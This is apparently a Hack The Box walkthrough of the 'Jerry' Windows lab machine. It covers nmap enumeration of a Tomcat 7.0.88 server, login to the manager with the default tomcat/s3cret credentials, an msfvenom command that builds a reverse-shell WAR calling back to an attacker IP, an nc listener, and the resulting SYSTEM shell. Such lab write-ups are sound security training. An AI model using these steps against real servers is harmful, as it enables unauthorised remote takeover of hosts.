hack the box walkthrough – Jerry machine
Today's post covers my first Windows HTB machine, probably the easiest one, called Jerry.
Let's jump in!
As usual, we start the enumeration phase with an nmap scan of the given IP address:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.79.3 Full
Running a Full scan on 10.129.79.3
Host is likely running Windows
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:27 EST
Initiating Parallel DNS resolution of 1 host. at 10:27
Completed Parallel DNS resolution of 1 host. at 10:27, 0.03s elapsed
Initiating Connect Scan at 10:27
Scanning 10.129.79.3 [65535 ports]
Discovered open port 8080/tcp on 10.129.79.3
Completed Connect Scan at 10:31, 262.72s elapsed (65535 total ports)
Nmap scan report for 10.129.79.3
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
8080/tcp open  http-proxy
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.79 seconds

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:31 EST
Nmap scan report for 10.129.79.3
Host is up (0.046s latency).
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds
As you can see, I am getting used to nmapAutomator. It is very convenient and fast.
From the nmap results we can see that we are dealing with a Windows machine and that a single service is exposed: Apache Tomcat 7.0.88 on port 8080 (the other 65534 ports are filtered).
A few login attempts on the Tomcat Web Application Manager gave me access with the login/password combination tomcat/s3cret. This is the sample account that ships commented out in Tomcat's own tomcat-users.xml, so it is one of the first pairs worth trying against any exposed manager.
Since the manager role lets me deploy new applications, and a deployed application runs arbitrary code inside the Tomcat process, I am going to get a reverse shell by deploying a malicious WAR file.
[email protected]:~/Documents$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.64 LPORT=4242 -f war -o revshell.war
WARN: Unresolved or ambiguous specs during Gem::Specification.reset:
      reline (>= 0)
      Available/installed versions of this gem:
      - 0.1.5
      - 0.1.3
WARN: Clearing out unresolved specs. Try 'gem cleanup '
Please report a bug if this causes problems.
Payload size: 1089 bytes
Final size of war file: 1089 bytes
Saved as: revshell.war
I just need to upload it through the "WAR file to deploy" form of the Tomcat Web Application Manager:
Then it is listed as a deployed application under the /revshell path:
I started my listener:
[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
and triggered the payload by browsing to http://IP:8080/revshell/ (the generated WAR serves the JSP as the context's welcome file, so requesting the bare path is enough).
The shell came back already running as NT AUTHORITY\SYSTEM, so no privilege escalation step was needed: the Tomcat service runs as LocalSystem, which turns manager access into full control of the host.
[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.79.3] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system